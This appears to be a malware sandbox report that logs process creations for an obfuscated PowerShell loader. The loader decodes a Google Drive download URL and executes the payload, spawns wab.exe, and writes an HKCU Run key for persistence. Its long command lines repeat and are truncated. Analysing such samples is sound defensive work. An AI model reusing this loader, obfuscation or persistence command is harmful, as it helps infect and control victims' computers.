Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%chansonens% -w 1 $hypokonderens=(get-itemproperty -path 'hkcu:\oversigtslisterne\').incharity;%chansonens% ($hypokonderens)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale s,belcomprlgi.peainputbtog,t.ma tisrejempservilu.areikop,lt bund(mamon$ skoba shopfwadmopugedar affavunproeablutnt,resdfejlresvigesmisgr)sjlss ');$jellab=$omskrivendes[0];dryptrrendes (thysanoura 'mistr$ideolgblodtldelklotorc bkvadraopruslko ke:frihed ulfaide.ras ars ptilsyes.attn sarrsvrel.aundv,thomagiforheokiaatnvdderskine.spe,veakejseg de u=phy,an icroecuculw prec-antlio actbstan jsr.kresaltmcd ffethalte mazemsforehyseisms genet fireegabesmfog.o.irresn la.hesubsutg,rod.snd rw supreakti blsladcvedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$langshans225 = 1;$forandringssaetninger='substrin';$forandringssaetninger+='g';function thysanoura($agentens){$oncography=$agentens.length-$langshans225;for($preindisposing=5; $preindisposing -lt $oncography; $preindisposing+=(6)){$bugtningernes+=$agentens.$forandringssaetninger.invoke($preindisposing, $langshans225);}$bugtningernes;}function dryptrrendes($eksportpriserne){& ($peridot) ($eksportpriserne);}$hjlpevariabels=thysanoura 'tilbumindseo autozdiscoi tenolanskulfo.tjasolce/nere 5 pie.. comp0 dana st mm(paafyw pleninonden ehngdombyto nebewhindespost, .ooscnisomet,akul fin h1uriel0.uzzl.tangs0squal;apart omgrewpiratibou,inshape6uprid4inspe;un.il a,elpxbana,6fo,ur4promi;pro s gemmr u snvouts :sikri1eu,as2polac1reill.ardor0 mett)ultra michgpra ie salac huddkliturotaxon/demor2 hu t0caeom1 he r0 wri 0.nsum1forma0vattp1horiz .etjef.gedaias uerprogreobersfobtecokarikxde,at/pull,1pwcat2.besk1am.rb..nwid0 fond ';$epiphyll=thysanoura ' triuulimmasenefoef,rklrshack-tr,nsa sithgti.srelgstrnmennet unbe ';$jellab=thysanoura ' ma.ehplusgttilskt hekspsports p.ed: meri/propo/rabardsarodr dithibrystv,fikke rele..vrfagcaukfoco umomiljvgf,glelb,rgaevacuu.smidicbetleopolyamtessa/entrauconstcdamef?aftjee ynebxlnkamp,inero opvarintegtvaria=sampldpiloboannitwpo.denforbrlmegacotrvlearo kedfor i&ho.seigjortdprint= ener1domi,h,nter8 ennovaccru0 tan.zspr t9,rsteqs.mle8inte bun,reosp.tt4unfavu knaptspindemete ndornukatavibf,rsitmetalasl nginyctewhei.spspinocsuperikroke8openhyundiv0kongsjce eay isjrtheisngu df3 schl ';$afprvendes=thysanoura ' .ima>ankny ';$peridot=thysanoura 'un,ilikropeefletnxpa.ah ';$dysmorfismen = thysanoura ' amene zimbcbesl.hgoddaodrake riba%offerasylt,prdnbspanlagdcrookarenast embeahoejr%,ones\uningddisinichefkalsdpelsagsko eluvgkonfiihensys delpt be ui uffc ram.. du,oh.onsce h ndd appa d,ivi& caus&grews dkseehematc forsh ndeno dans couac$ uret ';dryptrrendes (thysanoura ',eori$omgrug arnel .ubloh.gleb rana finlloppus:ri,etimindrntiaartafmr.epsykorblegsmudfrsoalumid ,misiprivilpaperltrykki sineodoce nslyng=li,en( sangctidsbmunduld tet c.nc/ ha.dcvedre sp y$polypdovervy skumskyurimtilbuopremur antifexperi delesexan mjernbe overnjounc)opels ');dryptrrendes (thysanoura 'pe.se$hexylgspan,l fusio .raubbejlea udd.l .mer:topo.otu ehmwithhs ,plakflankrn nehi.ybfrvpublie crimnenzymdcheckefor,ts ove.=dogmi$bebudjtotale 